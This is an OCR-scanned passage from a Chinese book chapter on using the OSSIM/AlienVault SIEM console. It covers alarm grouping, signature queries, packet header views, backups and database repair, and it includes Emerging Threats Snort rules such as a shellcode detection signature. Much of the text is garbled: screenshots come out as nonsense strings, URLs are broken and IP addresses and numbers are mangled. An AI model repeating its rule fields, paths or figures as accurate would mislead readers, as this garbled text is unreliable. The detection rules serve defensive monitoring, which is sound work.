à Msn Wb mun SHOME, NET any -> any 445 (msg."ET SCAN Behavioral Unusual Port 445 traffic. Potential Scan or Infection" 
$ Create Now Topic threshold: type both, track Lu Src, count 70 , seconds 60; reference:url,doc.emergingthreats.net/2001569; 
index ciatstype mise activity: cid 2001568, rev 13) 
à Search 
Changes 
7 Preferences Asses 2011-10-12 19-1040 UTC 


Usar Rateronce Please entor documentation. commenta taise postives. or concerns wth ths mgnature Presa the Aftach button below to add samples or Pcaps 
 ATasteOIT Wh. 
TextlFormatinguies 


Signature Reference. 
WeoRtss Feed. 
Emerging aa 


get iz: SHOME, NET any -> any 445 (meg-"ET SCAN Behavioral, Unusual Port 445 trafic, Potential Scan or Infection"; 
ivity; 


Id: type both, track by sre, count 70 , seconds 60; classtype: misc-activi 
DAS A A 1569 510/200 1568. rev.13)) 


图 2-109 URL 显示 内 容 


第 二 个 图 标 链接 到 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7172。 
第 三 个 图 标 链 接 到 : http://doc.emergingthreats.net/2004242。 
第 四 个 链接 到 : http://doc.emergingthreats.net/2008907。 


接 下 来 ， 再 看 个 例子 ， 如 图 2-110 所 示 : 


GROUPED 
Signature 
SIGNATURE -IOIALS(*)a UNIQUESRC UNIQUEDST.& LATEST EVENT 
goaa 22m. jsoor "ET P2P ThunderNetwork UDP Traffic" 1 0 0 1969-12-31 20:00:00 


2-100 URL 显示 


第 一 个 图 标 链接 到 : http:/doc.emergingthreats.net/2009099 , 

第 二 个 图 标 链接 到 : http://en.wikipedia.org/wiki/Xunlei。 

第 三 个 图 标 链接 到 : http//www.kankan.com 。 

第 四 个 图 标 链接 到 : http://www.exploit-db.com/exploits/12369/。 

第 五 个 图 标 链接 到 : http:/securityhome.ewexploits/exploit.php?eid-17879866924d479451d88fa8. 
02873909。 

第 六 个 图 标 链接 到 : http://secunia.com/advisories/43137/。 

第 七 个 图 标 链接 到 : http://www.exploit-db.com/exploits/16087/。 

第 八 个 图 标 链接 到 : http:/cve.mitre.org/cgi-bin/cvename.cgi?name-CVE-2007-4620 

第 九 个 图 标 链接 到 : http://www.securityfocus.com/bid/44638。 

第 十 个 图 标 链接 到 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4091。 
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这 些 地 址 是 如 何 定义 ? 我 们 可 以 在 Web UI 的 Configuration 一 Threat Intelligence 一 Date 
Source 下 方 的 “Manage Reference” 按 钮 中 找到 答案 。 

我 们 可 以 在 系统 中 修改 这 些 默 认 的 URL， 通 过 单 击 “Manage References” 按 钮 实现 ， 在 
OSSIM 的 Web UI 下 通过 Configuration 一 Threat Intelligence— Data Source 菜单 中 单 击 “Manage 
References” 按 钮 可 以 显示 。 如 图 2-111 所 示 。 


THREAT INTELLIGENCE 


S CORRELATION DATA SOURCE 


REFERENCE TYPES NEW REFERENCE 


nj REFERENCE TYPE 


DATA SOURCE 10 


EVENT TYPE. 


EHE 


New erence tpi [New nerenence ree | New Reference Vale: 
图 2-111 默认 References 定 


2.16.8 SIEM 事件 聚合 

SIEM 控制 台 可 根据 不 同 数据 源 ， 将 报警 事件 进行 有 效 聚 合 。 宛 余 报 警 事件 的 聚合 系统 主 
要 有 前 端 数 据 采 集 、 中间 预 处 理 和 后 端 聚 类 与 合并 三 大 部 分 。 其 中 前 端 数据 采集 模块 主要 有 主 
机 监控 、 网 络 监控 、 防 火 墙 。 中 间 的 预 处 理 模块 主要 是 Sensor 的 插件 对 报警 事件 解码 、 分 类 
和 格式 处 理 等 。 后 端的 聚 类 与 合并 分 析 就 是 在 上 面 的 基础 上 进行 操作 。 

完成 所 做 的 分 析 处 理 之 后 ， 在 OSSIM 中 使 用 主机 监控 软件 OSSEC 来 实现 对 主机 的 审计 
记录 、 系 统 日 志和 应 用 程序 的 采集 分 析 。 它 支持 文件 的 完整 性 监控 、 注册 表 监 控 、 端 口 的 监控 、 
Rootkit 检测 和 部 分 进程 监控 ， 同 时 还 使 用 Snort/Suricata 对 网 络 上 的 数据 量 进行 嗅 探 ， 可 以 完 
成 对 网 络 上 的 IP 包 进 行 测试 等 功能 ， 也 可 以 进行 协议 分 析 、 内 容 查找 和 匹配 ， 以 用 来 探测 多 
种 攻击 和 嗅 探 (如 缓冲 区 溢出 和 CGI 攻击 等 )。 

SIEM 事件 聚合 流程 如 图 2-112 所 示 。 
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Unix/Linux/Window 


主机 监控 Ossec 的 s、 防 火 墙 等 设备 发 


NHID 监 摊 的 Snort 
报警 : 


报警 


日 志 预 处 理 分 类 、 
CET: 


图 2-112 SIEM 事件 聚合 流程 


2.16.9 SIEM £x 

前 面 介绍 过 不 同 版 本 OSSIM 的 SIEM 控制 台 ， 它 们 虽然 在 Web UI 有 所 差异 ， 但 是 所 有 具 
备 的 功能 却 相 同 ， 读 者 主要 了 解 元 数据 (Meta Data). IP 头 数据 、 网 络 层 协议 和 有 效 载荷 
(Payload) 这 几 个 概念 。 下 面 详细 说 明 这 些 概念 要 素 。 


(1) 元 数据 (meta data) 

元 数据 是 一 种 定义 性 数据 , 这 些 数据 提供 了 有 关 Snort 收集 的 入 侵 检测 的 数据 信息 。 例 如 ， 
记录 流量 过 程 的 时 间 信 息 , 对 于 整个 攻击 而 言 很 重要 ,这 也 是 事件 关联 分 析 的 重要 参数 。 但 这 
种 时 间 变 化 的 趋势 中 出 现 的 信息 ， 并 不 在 捕获 包 中 出 现 。 利 用 元 数据 标准 可 搜索 到 Snort 收集 
所 有 包含 标准 的 数据 。 


(2) 传感器 (sensor) 

对 于 分 布 式 的 OSSIM 系统 而 言 有 两 个 以 上 的 Sensor， 这 些 传感器 被 部 署 在 不 同 的 网 段 ， 
我 们 可 以 方便 地 查询 到 不 同 传感器 所 收集 的 数据 。 此 外 还 有 一 个 要 注意 的 问题 , 同样 一 个 传 感 
器 ,放置 在 网 络 外 部 与 放置 在 网 络 内 部 ， 对 于 同一 个 报警 ， 所 代表 的 含义 是 不 同 的 。 例如， 放 
置 在 防火 墙 外 侧 ， 它 如 果 收 到 了 Windows 共享 访问 试探 ， 这 就 是 疑似 网 络 攻击 。 如 果 在 内 部 
网 段 部 署 的 探测 器 ， 同 样 出 现 了 Windows 共享 访问 ， 那 很 有 可 能 是 一 次 正常 的 文件 共享 。 

如 图 2-113 所 示 ， 从 使 用 中 发 现 ，Data sources 数据 源 的 内 容 和 插件 有 关 ， 而 插件 在 Alienvault 
一 Center 的 Sensor 中 可 以 添加 。 
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SECURITY EVENTS (SIEM) 
SIEM REAL-TIME EXTERNAL DATABASES 
Search Signature mg o 
SHOW EVENTS DATA SOURCES TAXONOMY: PRODUCT TYPE IP REPUTATION ACTIVITY 
可 v z 
© Last Day 
Gast Week RISK TAXONOMY: EVENT CATEGORY IP REPUTATION SEVERITY 
vl v 区 

O Last Month 

O pate Range SENSORS 
1 

- 

5 J 192.168 11.105 
192116811218 
192.168.11.89 
1192168.11.105 
1192168.11.218 

EVENTS SROUPED TIMEL| (192.168.11.245 

1192.168,11.89 

show TREND crAPH Ml Off Context My Company 

C) scNwruse owTGMESO ^ vsouact a orsmwanon username 人 AS 
j 口 Ei snort. "ET DOS Microsoft Remote Desktop (RDP) 2015-03-14 18:3007 。 Ho3t-192-168-11-245:48554 localhost 3369 Empty. EE) 


Syn unen Reset 30 Second Dos Arempr 


2-103. 选择 不 同 的 传感器 


G) 报警 组 
报警 组 的 作用 是 形成 事件 报警 的 集合 。 报警 组 是 SIEM 控制 台 提 供 的 有 用 功能 , 它 允 许 报 
和 警 分 类 显示 出 来 , 用 于 集中 多 种 报警 。 可 以 把 系统 中 一 些 试探 性 攻击 、 零 碎 的 问题 报警 集中 在 
一 起 。 通 过 这 个 报警 组 功能 ， 可 以 很 快 搜索 到 黑客 攻击 信息 。 
如 图 2-114、 图 2-115 所 示 ， 我 们 给 出 了 未 分 组 和 分 组 后 的 效果 比较 。 


now ENTRI 
O DATE ~ STATUS $ INTENTESTRATEGY S memoD $ mt ATTACK PATTERN source $ DESTINATION 
O osassa open Agh cac communicanon Sinkhole- Abusech 2 一 wándows22:60111 二 sz2s5sl22shup 
Brows O A) aruteforce Authentication E 2 一 日 61153981858749 。 linuxtOssh 
O 20150515 open Ah Malvereinfecion infection 1 8 一 windows22:1870 =m i95 190 1362hup 
dou Qo Ah Tonine Spam botuoanTedroo — 8 — Windows22:1207 I i95 190 162p 
O  tOrews 已 dghrsieninfeion Bredolab s e= windows22:1039 4 102.195 143.133 ht 
JO nou O Aghsewareifecion. Homar s e= Windows22:1045 smi casa137 121p 
L] ioror © Aghroan infecion sany s 一 windows22:1064 本 74208164166hmmp © 
Trojan connecing to a 
O 250315 open Agh Suspidous Behaviour lowreputaon cnc 2 ee 一 Windows22:1064 国 74208154166hmp @ 
sever 
O 050315 open Agh Fake anrus infection Generic s e= windows22:1038 于 208 .431251s0hap 


2-14 未 分 组 效果 
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ALARMS 


LIST VIEW 


GROUP VIEW 


?SEARCH AND FILTER 


GRC 


n 


口 


OUPED EY [Alarm name v 
+ GROUP OWNER 
* — Malware infection — Malware contacting Dynamic Domain (575 sara) Release 
。 Ah Trojan fection 一 Kazy sisi ake 
e — -Q-bruteforce Authentication — SSH i413 alarms) Take 
* Ah Malware infection — infection (80 alarms) Releese 
= Áh cac communication — Sinkhole - Abuse ch G5s alarms) Release 
ALARM NAME EVENTS RISK DURATION 
+ [system Compromise — C&C Communication — Sinkhole- Abusech 228. E 16m 
* [System Compromise — C&C Communication — Sinkhole Abusech — 26 o 2280s 
*  [] System Compromise — C&C Communication — Sinkhole - Abuse.ch 5 2 2mins 


图 2-115 分 组 后 的 效果 
(4) 分 类 〈Category) / 子 类 
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HIGHEST RISK bescnipnon 
o Snakeoll kd 
o idfuihadgr 
2 
1 dddd kd 
o tetas 加 

source DESTINATION 
Windows22:60111 C87255.51229 ttp. 
windows22:1042 I 87.255.51.229:http 
Windows22:60111 Em6)25551229 np. 


这 种 分 类 报警 显示 , 在 重新 发 现 同一 类 攻击 的 早期 行为 方面 特别 有 用 。 假 如 遭 到 针对 特定 
服务 的 Dos 攻击 ， 那 么 通过 这 一 查询 ， 可 知 攻击 者 早 就 开始 侦察 踩点 。 即 使 是 在 Dos 攻击 中 
使 用 了 欺骗 IP 都 会 被 记录 下 来 ， 那 么 使 用 了 分 类 ， 将 缩小 查询 范围 ， 加 快 查询 速度 。Alarm 
类 下 面包 括 Attacks、Bruteforce、Dos、Malware、Scan 等 之 类 ， 如 图 2-116 所 示 。 


5HOW EVENTS DATA SOURCES TAXONOMY: PRODUCT TYPE IP REPUTATION ACTIVITY SEARCH CRITERIA CLAR OG 
: [ I r2 a Alarm/Mahware x 
O Last week RISK TAXONOMY: EVENT CATEGORY IP REPUTATION SEVERITY 
; i : á 
aware ic] 
e 站 
HOW TREND GRAPH M OF 
T] gonArune “DATEGMT 00a source DESTATiON uae SET mo m "ma 
i C deecbe event AV Maare, spyware Ba derectedon 20150227003532 locposts0297 —— 13125158990 smy 2:22 O M S 


TETT ao. 


2-116 事件 分 类 筛选 显示 


事件 分 类 / 子 类 的 详细 分 类 ， 我 们 可 以 在 Web UI 的 Configuration 一 Threat Intelligence 一 
Taxonomy 菜单 中 查看 ， 并 能 快速 筛选 内 容 。 


167 


源 安全 运 维 平台 一 一 OSSIM 最 佳 实 践 


C5) 特征 Csignature) 
特征 码 的 作用 是 查询 与 特征 值 匹 配 的 报警 。 在 日 常 日 志 分 析 时 , 用 特征 匹配 查询 非常 有 用 ， 
尤其 在 分 析 ShelloCode 攻击 时 非常 方便 。 如 图 2-117、 图 2-118 所 示 。 


events 
O sonArune DaiEauryoo sacie ostie mo DATASOURCENAME SOURCETYPE CATEGORY SUBCATEGORY (fi 
snort “ET 205091525 [ sort uson Epot  Shelicode 
OD Rng snetcoce —— Dern 
oare ALIENUAULT SENSOR INTERFACE 
20150315225757 GMT-700 dummyo 
TRIGGERED SIGNATURE EYENT TPEID cATEGORY sus cATEGORY 
团 国 四 国 merr "ET ATTACK RESPONSE Roshenturg Sneicode" 2009047 Eplok Shelcode 
NORMALIZED 
EVENT 
DATA SOURCE NAM Puooucr rene DATA SOURCE iD 
no Wrugon Detecuon 100 
SOURCE ADDRESS DESTINATION ADDRESS DESTINATION PORT PRoTocoL 
asss 3 w Tc 
PAYLOAD 


FlFiEQ 
QKOH 


File: emerging-shellcode rules 

Rule: alert tcp any any -> any any 

ET SHELLCODE Rothenburg Shellcode” 
flow: established 

content: "ID9 74 24 F4 5B 81 73 13 
content: "|83 EB FC E2 F4|" 

distance: 0 

reference: url.doc emergingthreats.net/2009247 
classtype: shellcode-detect 

sid: 2009247 

rev: 3 


PCAP FILE: 


DOWNLOAD IN PCAP FORMAT 


2-18 Shellcode 攻击 的 Payload 
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(6) 报警 时 间 
该 功能 是 为 了 查询 特定 时 间 内 的 报警 , 在 各 个 时 间 段 都 会 有 大 量 的 报警 产生 , 可 通过 时 间 
选项 ， 进 一 步 缩 小 查询 范围 。 如 图 2-119 所 示 。 


Search | Clear Becken p ne Current Search Criteria. [..Clear Al Criteria.. ] » Show Ml crier 
META PAYLOAD IP LAYER 4 

Eres fP] Sionature ED tme >»= [06/10/2014] [11:*:*] Clear any y none 

Sensor. Data Sources. 一 Rist 一 Summary Statistics 

| f uE Unge Events z Sneon Unique Duta sources 

agta FIR BEER TR P Reputation Unigue addresses: Source Port: TCP UD? Taonomy Unique IP inks [FQDN] 
Source | Destnaton. Destnation Port: TC? | UDP Product Types | Categories Unique Country Events 

Time fame sebeton GUT-4 00 meine anas 

[Today EE asta days | Last Week | Last 2 Weeks | Last Month | AII > Custom Views. 

> Dispiaying events 1-5 of 26,381 matching your selection. 36,958 total events in database 根据 时 间 显 示 查 询 

Ñ Signature à Date GMT-4:00+ Sensor Source Destnaton uad Risk 

sO 贺 四 四国 wort ETUSER_AGENTS Sogoui com. 2014-06-11 22:53:50 aienwaull 1032.1413158478 Q 220.181.124.110:80 0. F9) mme 


Spyware User-Agent (SogoulMEMiniSetup* 


图 2-119 报警 时 间 
在 上 图 所 示 的 界面 上 ， 单 击 GMT+400 右 侧 的 日 历 牌 图 标 ， 可 显示 具体 日 期 。 


(7) IP 头 数据 
我 们 时 常 需要 分 析 IP 头 数 据 ， 包 含 IP 数据 报 的 头 部 数据 。 从 包头 数据 中 我 们 可 以 获得 哪 
些 信息 呢 ? 
e 地址 : 可 以 鉴别 出 源 地 址 、 目 标 地 址 。 
© RAH: 显示 包括 IP 头 部 信息 ， 包 括 服务 类 型 、 生 存 期 、 段 ID 标识 、 段 偏 移 、 报 头 
校 验 及 报头 长 度 。 读 者 熟悉 这 几 部 分 的 数据 ， 异 常 的 域 数 据 往往 是 一 次 攻击 或 企图 
躲避 IDS 的 征兆 。 
C8) 传输 层 协议 数据 
该 部 分 包含 了 TCP 和 UDP 协议 的 信息 , 主要 包含 TCP 端口 、TCP 标志 及 TCP 域 数据 ( 序 
列 号 、 确 认 号 、 数 据 偏 移 量 、 保 留 位 、 窗 口 、 校 验 以 及 紧急 指针 等 )。 


C9) 有 效 负载 (Payload) 

有 效 载 荷包 含 了 应 用 程序 要 使 用 的 数据 ， 所 有 的 报警 中 搜索 存储 在 有 效 载荷 中 的 数 
据 串 。 这 里 的 有 效 载荷 可 以 包含 从 缓冲 区 溢出 到 各 种 木马 的 流量 特征 。 通过 Payload 能 快 
速 发 现 隐藏 的 木马 前提 是 要 知道 木马 的 特征 码 )。 我 们 先 看 这 条 报警 的 有 效 载 荷 ， 如 图 
2-120 所 示 。 
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Triggered Signature. Data Source Name Data Source ID Event Type ID 


smart "ET POLICY FTP Login Successful (non- € 


103214123 


Sensor Address Interface 
Sansor a 


103214133 emo 


Context Analysis ©) No action related to the context analysis 


|Source Address Dest. Address Ver Hdr Len TOS length ID fragment offset TTL chksum 


103214123 — 103214130. 4 — 20 


Options none 


DesPot R1 RO URG ACK PSH RST SYN FIN seq# 


2 64797 
[sans] antalol [stats] [sans] [tantalo] [sstts] 


Options none TCP 头 数据 


图 2-120 深度 解析 
再 看 另 一 条 SIEM 报警 , 这 是 DNS 查询 数据 包 , 它 包 含 了 UDP 头 数据 。 如 图 2-121 所 示 。 


ID& Date GMT-4:00 Triggered Signature. Data Source Name Data Source ID Event Type ID 


I E snort: &quot ET DNS Non-DNS or Non-Compliant DNS traffic 5 
20.284 2014.06.12011049 回回 al snot 1001 2014703 过 
DNS port Reserved Bit Sel - Likely KazySquot 


Source Address 。 Source Port Destination Address Destination Port Protocol  AssetS-D Priority Reliability ^ Risk 


403214119 50692 1112067935 E EI up 2-58 1 EE Las 


Sensor Address Interface 
Sensor 一 一 一 一 


103214133 eth0 


Context Analysis | C) No action related to the context analysis 


Source Address Dest. Address Ver HdrLen TOS length ID fragment offset TTL chksum 


11061 


L 103214131 — 1112087933 4 — 20 0 63 0 m o s 
= mab3s 


Options none 


source port dest port. 


UDP 头 数据 


50692 EI 
sans] [tantalo] [sstats] [sans] [tantalo] [sstats] 


2-121. UDP 头 数据 


奇怪 的 UDP 报 文 长 度 和 失败 的 校 验 和 , 很 可 能 暗示 有 攻击 存在 ,例如 一 个 长 度 为 0 的 UDP 
包 ， 系 统 认为 是 DNS 查询 而 报警 ， 其 实 有 可 能 是 一 次 DOS 攻击 。 
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(10) 通过 逻辑 运算 符 查 询 
SIEM 控制 台 使 用 了 一 套 扩展 的 逻辑 运算 符 来 建立 查询 。 如 图 2-122 所 示 。 逻 辑 运算 符 定 
义 出 为 建立 查询 而 选择 的 标准 元 素 之 间 的 关系 。 这 样 做 能 进一步 提炼 想 要 查看 的 报警 。 


Search | clear Peck E eh 


ES pee ee pitsaa 


Sensor Data Sources Risk 
[ r E 三 可 
> More Filters » Reputation Filters 
| More Filters. 
Extra Data: [userdatat v] ERE Timeline analysis: $ 
[ "3 EI seeks | Lost Month | An 
DsGroups | 可 
>= 48,655 total events in databas 
Network Groups: [ ike 可 
ature 
Host Groups: v EMMMAMN,ENN 
ains pw in cleartext 
Home networks È By source | By destination key Publicize File" 
图 2-122 逻辑 查询 
这 些 运算 符 如 下 : 
e = Ft. 
@ 一 : 不 等 于 。 
e < 小 于 。 
e < 小 于 等 于 
@ >: 大 于 。 
e >=: 大 于 等 于 。 
© Like: 可 以 使 用 % 作 为 通配符 。 


(11) 过 滤 不 同 的 Sensor 输出 
还 可 以 在 众多 筛选 条 件 中 选取 Sensors 选项 ， 来 过 滤 由 多 个 Sensor 所 输出 的 日 志 。 如 图 
2-123 所 示 。 


DEVICE IP EuENTSE 站 < UNIQUE EVENTS UNIQUE SRC UNIQUE DST. 
192 16891210 alenvauit 192 16891210 emo 9776 
口 E a 
19216891.131 sensor 19216891.131-emo 2081 
口 21 4 


2-123 ”通过 Sensor 过 滤 日 志 
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2.16.10 SIEM 警报 中 显示 计算 机 名 

采用 DNS 可 以 解析 主机 名 ， 但 有 时 候 容 易 出 问题 ， 这 里 推荐 采用 静态 解析 的 方式 ， 为 了 
让 OSSIM 能 够 顺利 解析 所 监控 的 服务 器 发 来 的 日 志 , 我 们 需要 配置 hosts 文件 。 我 们 知道 hosts 
文件 的 作用 相当 于 DNS, Linux 系统 在 向 DNS 服务 器 发 出 域名 解析 请 求 之 前 , 会 查询 /etc/hosts 
文件 ， 如 果 里 面 有 相应 的 记录 ， 就 会 使 用 hosts 里 面 的 记录 。/etc/hosts 文件 通常 里 面包 含 这 一 
条 记录 : 

127.0.0.1 localhost.localdomain localhost 


下 面 将 所 监控 的 所 有 服务 器 IP 和 主机 名 称 对 应 ， 每 条 记录 对 应 一 台 主机 。 然 后 分 发 到 各 
台 服 务 器 上 。 

这 个 可 以 通过 修改 /etc/hosts 文件 实现 ，hosts 文件 是 用 来 把 主机 名 字 映 射 到 IP 地 址 的 方 
法 ， 这 种 方法 比较 简单 。 但 这 种 映射 只 是 本 地 映射 ， 也 就 是 说 每 台 机 器 都 是 独立 的 。 

修改 /etc/hosts 文件 ， 实 例如 下 (显示 结果 如 图 2-124 HR): 

# cat /etc/hosts 


41275500. 下 localhost 
10.32.X.Y alienvault.alienvaultalienvault 
107325X.7 win7 


n DATE © STATUS $ INTENTA STRATEGY $ METHOD $ ms $ ATTACK PATTERN SOURCE $ DESTINATION 
O  2M40806 open infection 2 一 win7:60358 国 180.149155.142hp 
口 。 2040806 open Linux Package Manager — 1 一 10321888946047] ep 205121926 8p. 


O 2000806 open infection 2 e= win7.56621 fil 105.120.151 53h 


O 20040806 open Linux Package Manager — 1 o= alienvault:50374 10703837758. 


图 2-124 SIEM 警报 中 以 计算 机 名 称 显示 


2.16.11 SIEM 事件 保存 期 限 

即使 你 有 再 大 的 硬盘 ， 经 过 一 段 时 间 ， 也 会 被 Sensor 不 断 传输 过 来 的 各 种 告警 所 填 满 ， 
而 且 关 联 分 析 引 擎 分 析 安 全 事件 的 总 数 也 有 个 上 限 所 以 新 版 OSSIM USM 系统 设 定 了 以 下 限 
ftl: 


在 系统 磁盘 中 保存 30 个 备份 文件 (位置 在 /varlib/ossim/backup/) 。 
在 线 可 查询 的 安全 事件 保存 90 天 (数值 为 0， 代表 不 备份 ) 。 
在 数据 库 中 保存 4000 万 条 记录 (数值 为 0 代表 无 限 ) 。 
备份 时 间 为 01:00。 
Alarm 告警 永久 保存 (也 可 设置 生命 期 ) 。 
具体 参数 我 们 可 以 到 Configuration- administration Main 菜单 下 的 backup 选项 中 查看 ， 
如 图 2-125 所 示 。 
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ADMINISTRATION 


users | MAIN | BACKUPS 
Backup 
Backup configuration: backup database, directory, interval 
Enable SIEM database backup vaw] 
Number of Backup files to keep in the filesystem po 
— 

Events to keep in the Database (Number of days) po 

Events to keep in the Database (Number of events) [50000000 

Backup start time. Eee 

Active Netfiow Window 四 

Alarms Expire Ww 

Alarms Lifetime b 

Logger Expiration Ns Tv 

Acive Logger Window | 


图 2-125 配置 备份 选项 


2.16.12 SIEM 数据 源 与 插件 的 关系 

通过 Sensor 配 置 界面 中 启用 的 插件 ， 能 直观 地 反映 在 仪表 盘 和 SIEM 控制 台 上 ， 如 图 2-126 所 
示 ， 图 中 以 amba 插件 为 例 说 明 (前 提 是 已 有 该 设备 )， 首 先 启用 aruba 插件 ， 应 用 生效 后 ， 便 能 在 
仪表 盘 中 显示 事件 的 多 少 。 用 户 还 可 以 在 SIEM 控制 台 上 筛选 aba 数据 源 所 产生 的 所 有 事件 。 


a» secum 
SIEM: EVENTS BY SENSOR/DATA SOURCE SO 


全 而 


Deregnon couecnon 


1 < 
| Total number of plugins: 183 ,/ 


] ins enabled Hugins available 
| pene 1 
s 
1 | Cana = "m 
1 一 
| | ciscoasa = + 
! | omdesyscg - * 
1 
\ - + 
\ = + 
- * 
- * 


2-126 ”数据 源 与 插件 的 关系 
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2.16.13 SIEM 日 志 显 示 中 出 现 0.0.0.0 地 址 的 含义 

根据 RFC 文档 描述 ，0.0.0.0/32 可 以 用 作 本 机 的 源 地 址 ， 作 用 是 帮助 路 由 器 发 送 路 由 表 中 
无 法 查询 的 包 。 如 果 设置 了 全 零 网 络 的 路 由 , 路 由 表 中 无 法 查询 的 包 都 将 送 到 全 零 网 络 的 路 由 
中 去 。 还 记得 吗 ， 在 路 由 器 配置 中 可 用 0.0.0.0/0 表示 默认 路 由 ， 作 用 是 帮助 路 由 器 发 送 路 由 
表 中 无 法 查询 的 包 。 严 格 说 来 0.0.0.0 表示 所 有 未 知 的 主机 和 目的 网 络 。 这 里 的 “未 知 ”是 指 
在 本 机 的 路 由 表 里 没 有 特定 条 目 指明 如 何 到 达 。 

如 果 输 入 : 


# netstat -anp | grep LISTEN | grep -v LISTENING 


查看 这 条 命令 显示 结果 就 比较 好 理解 了 。 而 在 OSSIM 系统 的 SIEM 日 志 中 查看 到 0.0.0.0, 
它 表 示 没 有 对 应 的 IP 与 该 日 志 相 关联 。 

有 时 候 在 SIEM 的 Web UI 下 查看 到 src ip 和 dst ip 也 为 0.0.0.0, 这 是 因为 这 些 日 志 不 涉及 
网 络 连 接 ， 为 了 填充 这 个 字段 ， 所 以 全 部 为 0， 即 没有 源 和 目的 IP。 还 有 种 情况 比较 特别 ， 当 
OSSIM 主机 解析 失败 时 也 会 标记 全 0 的 地 址 ， 这 时 可 以 通过 修改 /etc/hosts 的 方法 手工 逐条 加 
入 即 可 解决 。 另 一 种 情况 ， 当 出 现 ossec-syschek、ossec 本 地 文件 系统 进行 检查 时 ， 目 标 地 址 
及 端口 会 被 0 填充 。 如 图 2-127 所 示 。 


Date Alienvault Sensor Interface 
2014-01-16 23:13:59 CMT-5:00 alienvauit [192.168.120.77] eto 
Triggered Signoture Event Type ID Category. Sub-Category 
ossec Integrity checksum changed. 550 Alert HostlDS Alert 
Data Source Nome Product Type Dota Source ID 


ossec-syscheck Mus on Detection 7094 ó 
Source Address Sacer Protocol 
lalenvaui] 192.168.120.77 — aa Tc 
图 2-127 目标 地 址 和 目标 端口 为 全 0 


当 遇 到 Anomalies 流量 时 ， 异 常 流量 通常 是 Hacker 用 拆 包 (通过 数据 包 碎 片 传输 ) 方法 
进行 攻击 防火 墙 等 网 络 设 备 ， 这 种 攻击 被 称 为 Anomalies， 所 以 这 种 包 ， 抓 到 后 分 析 发 现 它 的 
源 地 址 、 目 标 地 址 不 全 或 没有 。 


2.16.14 ”无 法 显示 SIEM 安全 事件 时 处 理 方法 
当 用 户 非法 终止 alienvault-update 升级 过 程 的 数据 库 升 级 时 ， 以 及 出 现 非法 关机 操作 时 ， 
在 Web UI 中 的 SIEM 控制 台 上 ， 很 有 可 能 会 出 现下 面 的 提示 : 
No events matching Your search criteria have ben found.Try fewer conditions . 
应 该 避免 上 述 两 种 情况 的 发 生 ， 如 果 一 旦 遇 到 这 样 的 提示 ， 可 以 采用 下 面 的 方式 解决 。 
CD 通过 一 条 命令 尝试 修复 : 


#ossim-reconfig 
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(2) OSSIM 终端 控制 台 重 置 SIEM 数据 库 : 
#0ssim-setup \\ 启 动 0SSIM 终端 控制 台 


以 OSSIM 4 为 例 ， 依 次 选择 菜单 Maintenance&Troubleshooting 一 Maintain Database— Reset 
SIEM database。 这 时 系统 会 启用 脚本 ， 注 意 先 尝试 修复 数据 库 ， 实 在 不 行 再 进行 清理 SIEM 数 
据 库 。 在 重 置 SIEM 数据 库 完 成 之 后 ， 首 页 仪表 板 上 各 项 参数 因 缺 少数 据 而 无 法 显示 ， 这 时 待 
检测 数据 积累 到 一 定 程度 之 后 又 可 以 重新 显示 。 


2.16.15 SIEM 数据 库 恢复 

置 SIEM 数据 库 在 终端 下 操作 很 容易 ， 如 果 需 要 恢复 到 某 一 天 的 SIEM 数据 ， 则 按 图 
2-128 所 示 提 示 操 作 。OSSIM USM 系统 自动 备份 的 环境 数据 库 以 天 为 单位 ， 保 存 路 径 为 
/var/lib/ossim/backup， 自 动 备份 日 志 记 录 在 /var/log/alienvault/api/backup-notifications.log 文件 
中 。 当 用 户 需 要 恢复 某 天 的 数据 ， 选 中 相应 日 期 ， 例 如 在 图 中 显示 的 日 期 “17-04-2015”， 然 
后 单 击 “Restore” 按 钮 ， 经 过 数 分 钟 后 恢复 完成 。 


039216811105 (1) x 


root root 735 Apr 00 deTere-20150414-«qT-97 
232 apr CO delete-201504 az 


日 加 Sessions 
A 1921681111 
4 19235811 


environment Tiles backup 2015 041 
iles-backup 2015 041. 

root 1.0 Apr 

6or root 1:64 Apr 17 

Toot root 1.64 Apr 

root root 2.6K Apr 1 


DASHBOARDS 


ADMINISTRATION derer. 
6 ossim-setup. con 
8 20:04 ossin setup. pimus 
i rog Er assim setup. con 
ai MM bg Pul E s 


t 
VircualusnA none: /var 110/055 In/backup# I 


ssh2: AES-256-CTR — 29,4 


BACKUP SYSTEM LOGS, 
Scip suctesotuny maue 
INFO [192.168.111 
Configuration] 


DATES IN DATABASE 


2015-04-18 03:00:09 


Ev EH 


Backup successfully made 
2015-04-18 05:00:08 INFO [192.168.1170 - 
15012018 


environment] 


14-04-2015 

Backup successfully made 
13-04-2015 2015-04-18 03:00:05 INFO [192.168.1170 - 
12-04-2015 configuration] 
11-04-2015 
All Users 
TAIE 


Backup successtully made 
2015-04-17 03:00:21 INFO [132.168.1170 - 


$ 
TE Environmend 
Backup giroan made 
2015-04-17 03:00:18 nro (192 68.11 10 
CLEAR SIEM DATABASE configuration] : 
2-128. 恢复 SIEM 


2.16.16 EPS 的 含义 
EPS (Events Per Second) 是 系统 每 秒 能 处 理 的 事件 数量 ， 这 一 数值 反映 了 系统 收集 、 处 
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理 、 整 合 事件 的 能 力 , 同时 反映 了 处 理 过 的 事件 写 入 数据 库 的 能 力 , 假设 系统 平均 EPS 为 500, 
每 天 的 事件 数量 为 4320 万 条 ， 那 么 从 一 个 月 的 数据 中 找 出 符合 条 件 的 事件 ， 对 数据 库 将 是 个 
挑战 。 

在 大 数据 时 代 ， 安 全 需 主动 ， 当 发 生 事件 数据 增长 超出 预期 峰值 限制 时 , 分 析 人 员 能 否 确 
定 这 种 事件 量 增长 是 否 由 主动 攻击 引起 的 ， 这 一 点 至 关 重 要 。OSSIM 系统 不 仅 能 够 处 理 这 些 
增长 的 情景 ，SIEM 将 把 每 秒 事件 量 (EPS) 在 最 关键 的 时 刻 通 知 安全 团队 ， 以 访问 它们 的 主 
要 态势 感知 工具 , 但 是 在 免费 版 OSSIM 系统 中 EPS 为 500, 企业 版 EPS 的 值 可 以 达到 3000+。 
不 过 , 这 个 值 需要 硬件 配置 足够 (Xeon E5 8Core CPU, 物理 内 存 32GB, 完成 关联 分 析 5000EPS 
的 任务 )。 每 秒 事 件数 量 与 EPS 变化 趋 式 如 图 2-129 所 示 。EPS 变化 趋势 查看 方法 是 : Web UI 
中 通过 Configuration — Deplayment— AlienVault center 选择 节点 名 下 的 OSSIM 主机 ， 在 
